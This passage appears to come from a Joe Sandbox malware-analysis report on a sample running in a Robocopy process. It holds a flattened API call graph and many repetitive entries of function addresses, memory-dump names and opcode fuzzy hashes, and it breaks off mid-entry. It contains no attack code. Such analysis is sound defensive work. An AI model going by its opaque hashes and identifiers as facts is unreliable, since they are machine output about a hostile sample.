LdrInitializeThunk 79519->79522 79520 816719 79520->79475 79522->79520 79523->79516 79524 820430 79525 820453 79524->79525 79526 8147f0 LdrLoadDll 79525->79526 79527 820477 79526->79527 79528 821a70 79529 821a8c 79528->79529 79530 821ab4 79529->79530 79531 821ac8 79529->79531 79533 829770 NtClose 79530->79533 79532 829770 NtClose 79531->79532 79534 821ad1 79532->79534 79535 821abd 79533->79535 79538 82b980 RtlAllocateHeap 79534->79538 79537 821adc 79538->79537 79539 828d30 79540 828d4a 79539->79540 79543 4832df0 LdrInitializeThunk 79540->79543 79541 828d72 79543->79541 79545 819eff 79547 819f0f 79545->79547 79546 819f16 79547->79546 79548 82b860 RtlFreeHeap 79547->79548 79548->79546

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 048335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: ba19a962d3b396f552ddd82a7a8b05c19300eacfd6e6c97cfc2e540b6881d0ef
                                                                                                                                                                              • Instruction ID: 80a4e3a9cff147c37c8720f28bcd2eef09f52e2f30e1762c491bc2b5f3c3fa0e
                                                                                                                                                                              • Opcode Fuzzy Hash: ba19a962d3b396f552ddd82a7a8b05c19300eacfd6e6c97cfc2e540b6881d0ef
                                                                                                                                                                              • Instruction Fuzzy Hash: 5190023560550806F100B158451470610058BD0205F65C911A142956CD87D5DA9565A3
                                                                                                                                                                              Function 04834650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 317411a39b98f3851d3446eb5676ef91fba4d37d9b90158baa9cc3cc12fcb902
                                                                                                                                                                              • Instruction ID: e68b296dd4382630a20f665271b12abcb0714ad7cf2137366b808dc541e87d5b
                                                                                                                                                                              • Opcode Fuzzy Hash: 317411a39b98f3851d3446eb5676ef91fba4d37d9b90158baa9cc3cc12fcb902
                                                                                                                                                                              • Instruction Fuzzy Hash: 99900265601504466140B158480440660059BE1305395C615A1559564C8658D999926A
                                                                                                                                                                              Function 04834340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: a7fbc93535842c48719626da8dd854f676911582d8746a763ef65f61894d98c1
                                                                                                                                                                              • Instruction ID: 5cbd66af30ccd0b7f0f0973e24a9335e4247d5b54215cef3f538299009cd1bae
                                                                                                                                                                              • Opcode Fuzzy Hash: a7fbc93535842c48719626da8dd854f676911582d8746a763ef65f61894d98c1
                                                                                                                                                                              • Instruction Fuzzy Hash: E090023560580416B140B158488454640059BE0305B55C511E1429558C8A54DA9A5362
                                                                                                                                                                              Function 04832CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 3086a3533f5b286fb0ca226fccdb9830d85b116012aa75c71f8d2f12a61092e1
                                                                                                                                                                              • Instruction ID: d03079f8ece75e93229b1aeadf1e9d2e748a32ce6a58ceadecadf88ab60d20be
                                                                                                                                                                              • Opcode Fuzzy Hash: 3086a3533f5b286fb0ca226fccdb9830d85b116012aa75c71f8d2f12a61092e1
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E90023520140806F100B598540864600058BE0305F55D511A6029559EC6A5D9D56132
                                                                                                                                                                              Function 04832C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 628e40801f86392a0107f69f520dee8ee6521dfc7d4099303f0c26469042d94a
                                                                                                                                                                              • Instruction ID: bc50db81fa1ad03b3038eaf5f77035936f943567939979e375a1eda6ea30628b
                                                                                                                                                                              • Opcode Fuzzy Hash: 628e40801f86392a0107f69f520dee8ee6521dfc7d4099303f0c26469042d94a
                                                                                                                                                                              • Instruction Fuzzy Hash: 2C90023520140C46F100B1584404B4600058BE0305F55C516A1129658D8655D9957522
                                                                                                                                                                              Function 04832C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: e7f75b2064e98ab617fb25992f6434d87be5c5fcfc9f3e2d5db7a11a13f828ec
                                                                                                                                                                              • Instruction ID: b17e7068bc2388dec22e595ca14a8a083bbdd610ec3de6666ed2e3b460445f57
                                                                                                                                                                              • Opcode Fuzzy Hash: e7f75b2064e98ab617fb25992f6434d87be5c5fcfc9f3e2d5db7a11a13f828ec
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F90023520148C06F110B158840474A00058BD0305F59C911A542965CD86D5D9D57122
                                                                                                                                                                              Function 04832DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: b89d6ce8b93be32b8541f52c87364400106b13dd85a78f9053328096f71854f9
                                                                                                                                                                              • Instruction ID: cc932a090e38df263d9a15b0988b4ffa77f2641318e02473e8616992cdec7d13
                                                                                                                                                                              • Opcode Fuzzy Hash: b89d6ce8b93be32b8541f52c87364400106b13dd85a78f9053328096f71854f9
                                                                                                                                                                              • Instruction Fuzzy Hash: 1B900225242445567545F158440450740069BE0245795C512A2419954C8566E99AD622
                                                                                                                                                                              Function 04832DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 0bd4dcd923a0c089be3931ff0bc9a9ac1e58d40b5c012cd706fbe386b0818050
                                                                                                                                                                              • Instruction ID: 4c65e660b0988e997098a0e0d270678f835091f85af32ee85ba11930ebcfbf3e
                                                                                                                                                                              • Opcode Fuzzy Hash: 0bd4dcd923a0c089be3931ff0bc9a9ac1e58d40b5c012cd706fbe386b0818050
                                                                                                                                                                              • Instruction Fuzzy Hash: B190023520140817F111B158450470700098BD0245F95C912A142955CD9696DA96A122
                                                                                                                                                                              Function 04832D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: a0f67f53a989817d37c18e19283f6f79ffd680f11e9b7d4e17733becddeb42a9
                                                                                                                                                                              • Instruction ID: c288de831e6fa83c3a9a457ab88031280fc0a90a2d2fd7f74651664166c0dac6
                                                                                                                                                                              • Opcode Fuzzy Hash: a0f67f53a989817d37c18e19283f6f79ffd680f11e9b7d4e17733becddeb42a9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0290022D21340406F180B158540860A00058BD1206F95D915A101A55CCC955D9AD5322
                                                                                                                                                                              Function 04832D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: f8abdee3bc6edf783dd4fdba3f7a656f3069ba14c770d9fd2380b71bb3ab4936
                                                                                                                                                                              • Instruction ID: a9129bfb37055d6d4c0df004d5058642ea3ddbeb25b2730d05cd4f4c8d0aff83
                                                                                                                                                                              • Opcode Fuzzy Hash: f8abdee3bc6edf783dd4fdba3f7a656f3069ba14c770d9fd2380b71bb3ab4936
                                                                                                                                                                              • Instruction Fuzzy Hash: C590022530140407F140B15854186064005DBE1305F55D511E1419558CD955D99A5223
                                                                                                                                                                              Function 04832E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 19a9ff3bdffb79bd0c4c6e3bc53e9b07da2c51a070ed57237e89c0843f6b6727
                                                                                                                                                                              • Instruction ID: 22d16014021112e3fabb1aa1098f07d35dc8673d5d80863408625a73a5e3ed8b
                                                                                                                                                                              • Opcode Fuzzy Hash: 19a9ff3bdffb79bd0c4c6e3bc53e9b07da2c51a070ed57237e89c0843f6b6727
                                                                                                                                                                              • Instruction Fuzzy Hash: D290022560140906F101B1584404616000A8BD0245F95C522A2029559ECA65DAD6A132
                                                                                                                                                                              Function 04832EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 7cd9df7d5c406db9bf9cf9d7968de8610b4c959095bd5355fbdfcea67158a44c
                                                                                                                                                                              • Instruction ID: bcb108943cadec730fc0dc6bb401b57c6a76254d3202d704e8763c2778d9f4ee
                                                                                                                                                                              • Opcode Fuzzy Hash: 7cd9df7d5c406db9bf9cf9d7968de8610b4c959095bd5355fbdfcea67158a44c
                                                                                                                                                                              • Instruction Fuzzy Hash: FE90026520180807F140B558480460700058BD0306F55C511A3069559E8A69DD956136
                                                                                                                                                                              Function 04832FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 767117ecb1ceb2b38953e506a07ff2e7fb0b6f03d208e557e632cef07b718b44
                                                                                                                                                                              • Instruction ID: 660598b14263f8c36bc4af9f7a6846ea7872c5ed2b46e64aec4b173ca11f9610
                                                                                                                                                                              • Opcode Fuzzy Hash: 767117ecb1ceb2b38953e506a07ff2e7fb0b6f03d208e557e632cef07b718b44
                                                                                                                                                                              • Instruction Fuzzy Hash: CA900225601404466140B16888449064005AFE1215755C621A199D554D8599D9A95666
                                                                                                                                                                              Function 04832FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 5e7cf93d710a75b348ff5f34a6ef592bb7f136e7979858cb400195495cbbd2c2
                                                                                                                                                                              • Instruction ID: f9627e2ebf24615a1a4606e44d372e83c1b3cd73f4f538a0f53c2bd9d73e12b4
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e7cf93d710a75b348ff5f34a6ef592bb7f136e7979858cb400195495cbbd2c2
                                                                                                                                                                              • Instruction Fuzzy Hash: 21900225211C0446F200B5684C14B0700058BD0307F55C615A1159558CC955D9A55522
                                                                                                                                                                              Function 04832F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: db7554891371b16b7ddd3de3e7709c6dc318248fed18a516fa0be598722e1c5c
                                                                                                                                                                              • Instruction ID: 0a3281707f835d841c37c21ba374dddb80350e156648d9bf3b1f74462bda2b29
                                                                                                                                                                              • Opcode Fuzzy Hash: db7554891371b16b7ddd3de3e7709c6dc318248fed18a516fa0be598722e1c5c
                                                                                                                                                                              • Instruction Fuzzy Hash: CB90026534140846F100B1584414B060005CBE1305F55C515E2069558D8659DD966127
                                                                                                                                                                              Function 048339B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: e408435b2bc999333397752f6c30fcc3dbc9abf1d2c96703bc4fec67d4cfcd57
                                                                                                                                                                              • Instruction ID: 470d6f400c833359ff2a8454a270d4e28aef27021f02490a089fc6be642d33ef
                                                                                                                                                                              • Opcode Fuzzy Hash: e408435b2bc999333397752f6c30fcc3dbc9abf1d2c96703bc4fec67d4cfcd57
                                                                                                                                                                              • Instruction Fuzzy Hash: 0490022524545506F150B15C44046164005ABE0205F55C521A1819598D8595D9996222
                                                                                                                                                                              Function 04832AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: d19ba91c9838e2eed13df81b184f3e5104556e880141e118678390e437d51a88
                                                                                                                                                                              • Instruction ID: 955e2d38342eb7e95ed61b54f73ec64f3b41fd4bae777aa3f2b966ac121e4788
                                                                                                                                                                              • Opcode Fuzzy Hash: d19ba91c9838e2eed13df81b184f3e5104556e880141e118678390e437d51a88
                                                                                                                                                                              • Instruction Fuzzy Hash: 2B900229211404072105F558070450700468BD5355355C521F201A554CD661D9A55122
                                                                                                                                                                              Function 04832AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 49665c5400b9e2ac1b6574e4ebb1dba376957c5e7755b3519021d01c264f2b0d
                                                                                                                                                                              • Instruction ID: dafad233780aee5eaf907086ae8e0d38bd5bf9f4ebf80bd952bfe651004cebe3
                                                                                                                                                                              • Opcode Fuzzy Hash: 49665c5400b9e2ac1b6574e4ebb1dba376957c5e7755b3519021d01c264f2b0d
                                                                                                                                                                              • Instruction Fuzzy Hash: BF900229221404062145F558060450B04459BD6355395C515F241B594CC661D9A95322
                                                                                                                                                                              Function 04832BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.00000000048ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_47c0000_Robocopy.jbxd
                                                                                                                                                                              Similarity
